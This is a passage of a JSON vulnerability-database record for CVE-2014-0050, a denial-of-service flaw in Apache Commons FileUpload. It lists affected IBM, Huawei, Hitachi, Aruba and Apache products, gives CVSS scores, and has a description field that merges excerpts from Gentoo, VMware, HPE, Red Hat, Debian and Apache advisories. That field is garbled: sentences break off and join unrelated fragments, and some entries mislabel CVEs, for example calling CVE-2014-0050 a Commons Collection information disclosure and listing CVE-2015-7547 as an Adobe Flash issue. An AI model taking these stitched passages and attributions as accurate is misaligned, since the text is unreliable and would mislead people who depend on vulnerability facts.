            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.4"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.14"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1200"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.2000"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.8"
          },
          {
            "_id": null,
            "model": "infosphere guardium data redaction",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.1"
          },
          {
            "_id": null,
            "model": "filenet business process framework",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.10"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.123"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.12"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.110"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.20"
          },
          {
            "_id": null,
            "model": "connections cr1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "espace meeting portal v100r001c00spc303",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "anyoffice v200r002c10l00422",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00sph503",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "8000"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-04"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.3.2"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.2.6"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.16.1"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "65400"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Red Hat",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "126007"
          },
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          },
          {
            "db": "PACKETSTORM",
            "id": "126404"
          }
        ],
        "trust": 0.5
      },
      "cve": "CVE-2014-0050",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-0050",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-0050",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-0050",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop\u0027s intended exit conditions. Apache Commons FileUpload is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to cause the application to enter an infinite loop which may cause denial-of-service conditions. \nThe following products are vulnerable:\nApache Commons FileUpload 1.0 through versions 1.3\nApache Tomcat 8.0.0-RC1 through versions 8.0.1\nApache Tomcat 7.0.0 through versions 7.0.50. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201412-29\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: Apache Tomcat: Multiple vulnerabilities\n     Date: December 15, 2014\n     Bugs: #442014, #469434, #500600, #511762, #517630, #519590\n       ID: 201412-29\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Apache Tomcat, the worst of\nwhich may result in Denial of Service. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  www-servers/tomcat           \u003c 7.0.56                 *\u003e= 6.0.41\n                                                            \u003e= 7.0.56\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Tomcat. Please review\nthe CVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll Tomcat 6.0.x users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=www-servers/tomcat-6.0.41\"\n\nAll Tomcat 7.0.x users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=www-servers/tomcat-7.0.56\"\n\nReferences\n==========\n\n[  1 ] CVE-2012-2733\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2733\n[  2 ] CVE-2012-3544\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3544\n[  3 ] CVE-2012-3546\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3546\n[  4 ] CVE-2012-4431\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4431\n[  5 ] CVE-2012-4534\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4534\n[  6 ] CVE-2012-5885\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5885\n[  7 ] CVE-2012-5886\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5886\n[  8 ] CVE-2012-5887\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5887\n[  9 ] CVE-2013-2067\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2067\n[ 10 ] CVE-2013-2071\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2071\n[ 11 ] CVE-2013-4286\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4286\n[ 12 ] CVE-2013-4322\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4322\n[ 13 ] CVE-2013-4590\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4590\n[ 14 ] CVE-2014-0033\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0033\n[ 15 ] CVE-2014-0050\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0050\n[ 16 ] CVE-2014-0075\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0075\n[ 17 ] CVE-2014-0096\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0096\n[ 18 ] CVE-2014-0099\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0099\n[ 19 ] CVE-2014-0119\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0119\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-29.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. Summary\n\n    VMware has updated vSphere third party libraries\n\n2. Relevant releases\n\n \n    VMware vCenter Server 5.5 prior to Update 2\n\n    VMware vCenter Update Manager 5.5 prior to Update 2\n\n    VMware ESXi 5.5 without patch ESXi550-201409101-SG\n\n\n3. Problem Description\n\n   a. vCenter Server Apache Struts Update\n\n      The Apache Struts library is updated to address a security issue.  \n\n      This issue may lead to remote code execution after authentication. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifier CVE-2014-0114 to this issue. \n\n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware         Product\tRunning\tReplace with/\n      Product        Version\ton\t      Apply Patch\n      =============  =======\t=======\t=================\n      vCenter Server 5.5       any         5.5 Update 2\n      vCenter Server 5.1       any         Patch Pending\n      vCenter Server 5.0       any         Patch Pending\n\n   b. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifiers CVE-2013-4590, CVE-2013-4322, and \n      CVE-2014-0050 to these issues. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware                 Product\tRunning    Replace with/\n      Product                Version\ton\t     Apply Patch\n      =============          =======\t=======    =================\n      vCenter Server         5.5     any        5.5 Update 2\n      vCenter Server         5.1     any        Patch Pending\n      vCenter Server         5.0     any        Patch Pending\n \n   c. Update to ESXi glibc package\n\n      glibc is updated to address multiple security issues. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifiers CVE-2013-0242 and CVE-2013-1914 to \n      these issues. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware         Product\tRunning  Replace with/\n      Product        Version\ton\t   Apply Patch\n      =============  =======\t=======  =================\n      ESXi           5.5       any      ESXi550-201409101-SG\n      ESXi           5.1       any      Patch Pending\n      ESXi           5.0       any      Patch Pending\n\nd. vCenter and Update Manager, Oracle JRE 1.7 Update 55\n\n      Oracle has documented the CVE identifiers that are addressed in \n      JRE 1.7.0 update 55 in the Oracle Java SE Critical Patch Update \n      Advisory of April 2014. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware                 Product\tRunning  Replace with/\n      Product                Version\ton       Apply Patch\n      =============          =======\t=======  =================\n      vCenter Server         5.5     any      5.5 Update 2\n      vCenter Server         5.1     any      not applicable *\n      vCenter Server         5.0     any      not applicable *\n      vCenter Update Manager 5.5     any      5.5 Update 2\n      vCenter Update Manager 5.1     any      not applicable *\n      vCenter Update Manager 5.0     any      not applicable *\n \n      * this product uses the Oracle JRE 1.6.0 family *\n\n4. Solution\n\n   Please review the patch/release notes for your product and version \n   and verify the checksum of your downloaded file. \n\n \n   vCenter Server and Update Manager 5.5u2\n   ---------------------------------------\n   Downloads and Documentation:\n   https://www.vmware.com/go/download-vsphere\n\n   ESXi 5.5\n   --------\n   Download:\n   https://www.vmware.com/patchmgr/findPatch.portal\n   \n5. References\n\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4590\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1914\n\n   JRE\n   ---\n   Oracle Java SE Critical Patch Update Advisory of April 2014\n  \nhttp://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html\n\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n   2014-09-09 VMSA-2014-0008\n   Initial security advisory in conjunction with the release of vSphere\n   5.5 Update 2 on 2014-09-09. Contact\n\n   E-mail list for product security notifications and announcements:\n   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\n   This Security Advisory is posted to the following lists:\n\n    security-announce at lists.vmware.com\n    bugtraq at securityfocus.com\n    fulldisclosure at seclists.org\n\n   E-mail: security at vmware.com\n   PGP key at: http://kb.vmware.com/kb/1055\n\n   VMware Security Advisories\n   http://www.vmware.com/security/advisories\n\n   VMware Security Response Policy\n   https://www.vmware.com/support/policies/security_response.html\n\n   VMware Lifecycle Support Phases\n   https://www.vmware.com/support/policies/lifecycle.html\n \n   Twitter\n   https://twitter.com/VMwareSRC\n\n   Copyright 2014 VMware Inc.  All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05324755\nVersion: 1\n\nHPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote\nDenial of Service, Arbitrary Code Execution and Cross-Site Request Forgery\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-11-04\nLast Updated: 2016-11-04\n\nPotential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary\nCode Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in HPE SiteScope. The\nvulnerabilities could be exploited to allow local elevation of privilege and\nexploited remotely to allow denial of service, arbitrary code execution,\ncross-site request forgery. \n\nReferences:\n\n  - CVE-2014-0114 - Apache Struts, execution of arbitrary code\n  - CVE-2016-0763 - Apache Tomcat, denial of service (DoS)\n  - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions \n  - CVE-2015-3253 - Apache Groovy, execution of arbitrary code \n  - CVE-2015-5652 - Python, elevation of privilege\n  - CVE-2013-6429 - Spring Framework, cross-site request forgery\n  - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)\n  - PSRT110264\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - HP SiteScope Monitors Software Series 11.2xa11.32IP1\n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2013-6429\n      6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L\n      6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n    CVE-2014-0050\n      8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2014-0107\n      8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2014-0114\n      6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2015-3253\n      7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2015-5652\n      8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n      7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)\n\n    CVE-2016-0763\n      6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L\n      6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided a resolution via an update to HPE SiteScope. Details on the\nupdate and each vulnerability are in the KM articles below. \n\n  **Note:** The resolution for each vulnerability listed is to upgrade to\nSiteScope 11.32IP2 or an even more recent version of SiteScope if available. \nThe SiteScope update can be can found in the personal zone in \"my updates\" in\nHPE Software Support Online: \u003chttps://softwaresupport.hpe.com\u003e. \n\n\n  * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): \n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02550251\u003e\n\n\n  * Apache Struts: KM02553983 (CVE-2014-0114):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553983\u003e\n\n\n  * Apache Tomcat: KM02553990 (CVE-2016-0763):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553990\u003e\n\n  * Apache XML Xalan: KM02553991 (CVE-2014-0107):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553991\u003e\n\n  * Apache Groovy: KM02553992 (CVE-2015-3253):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553992\u003e\n\n  * Python: KM02553997 (CVE-2015-5652):\n\n    *\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553997\u003e\n\n  * Spring Framework: KM02553998 (CVE-2013-6429):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553998\u003e\n\nHISTORY\nVersion:1 (rev.1) - 4 November 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \nFuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications. \n\nThis release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update\nto Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes\nvarious bug fixes, which are listed in the README file included with the\npatch files. \n\nThe following security issues are also addressed with this release:\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. (CVE-2014-0003)\n\nIt was found that the ParserPool and Decrypter classes in the OpenSAML Java\nimplementation resolved external entities, permitting XML External Entity\n(XXE) attacks. (CVE-2013-6440)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. By repeatedly sending a request \n    for an authenticated resource while the victim is completing the login \n    form, an attacker could inject a request that would be executed using the \n    victim\u0027s credentials. \n\nCVE-2013-2071\n\n    A runtime exception in AsyncListener.onComplete() prevents the request from \n    being recycled. This may expose elements of a previous request to a current \n    request. \n\nCVE-2013-4322\n\n    When processing a request submitted using the chunked transfer encoding, \n    Tomcat ignored but did not limit any extensions that were included. by streaming an unlimited amount \n    of data to the server. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 7.0.28-4+deb7u1. \n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 7.0.52-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7.0.52-1. \n\nWe recommend that you upgrade your tomcat7 packages. This issue was \n      found to be only partially addressed in CVE-2014-0094. \n\n      CVE-2014-0050 may lead to a denial of service condition. \n\n      vCenter Operations Management Suite (vCOps) is affected by both \n      CVE-2014-0112 and CVE-2014-0050. \n\n      vCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not \n      by CVE-2014-0112. \n\n      Workaround\n\n      A workaround for CVE-2014-0112 is documented in VMware Knowledge Base\n      article 2081470. While Tomcat 6 uses Commons FileUpload as part of the Manager\napplication, access to that functionality is limited to authenticated\nadministrators. \nThis issue was reported responsibly to the Apache Software Foundation\nvia JPCERT but an error in addressing an e-mail led to the unintended\nearly disclosure of this issue[1]. \n\nMitigation:\nUsers of affected versions should apply one of the following mitigations\n- - Upgrade to Apache Commons FileUpload 1.3.1 or later once released\n- - Upgrade to Apache Tomcat 8.0.2 or later once released\n- - Upgrade to Apache Tomcat 7.0.51 or later once released\n- - Apply the appropriate patch\n  - Commons FileUpload: http://svn.apache.org/r1565143\n  - Tomcat 8: http://svn.apache.org/r1565163\n  - Tomcat 7: http://svn.apache.org/r1565169\n- - Limit the size of the Content-Type header to less than 4091 bytes\n\nCredit:\nThis issue was reported to the Apache Software Foundation via JPCERT. \n \n Additionally a build problem with maven was discovered, fixed maven\n packages is also being provided with this advisory. \n\nReferences:\n\n  - CVE-2009-5028 - Namazu Remote Denial of Service\n  - CVE-2011-4345 - Namazu Cross-site Scripting\n  - CVE-2014-0050 - Apache Commons Collection Unauthorized Disclosure of\nInformation\n  - CVE-2014-4877 - GNU Wget, Unauthorized Disclosure of Information\n  - CVE-2015-5125 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5127 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5129 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5130 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5131 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5132 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5133 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5134 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5539 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5540 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5541 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5544 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5545 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5546 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5547 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5548 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5549 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5550 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5551 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5552 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5553 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5554 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5555 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5556 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5557 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5558 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5559 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5560 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5561 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5562 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5563 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5564 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5565 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5566 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5567 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5568 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5570 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5571 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5572 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5573 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5574 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5575 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5576 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5577 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5578 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5579 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5580 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5581 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5582 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5584 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5587 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5588 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6420 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6676 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6677 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6678 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6679 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6682 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-7547 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8044 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8415 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8416 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8417 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8418 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8419 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8420 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8421 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8422 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8423 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8424 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8425 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8426 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8427 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8428 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8429 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8430 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8431 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8432 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8433 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8434 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8435 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8436 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8437 - Adobe Flash, Unauthorized 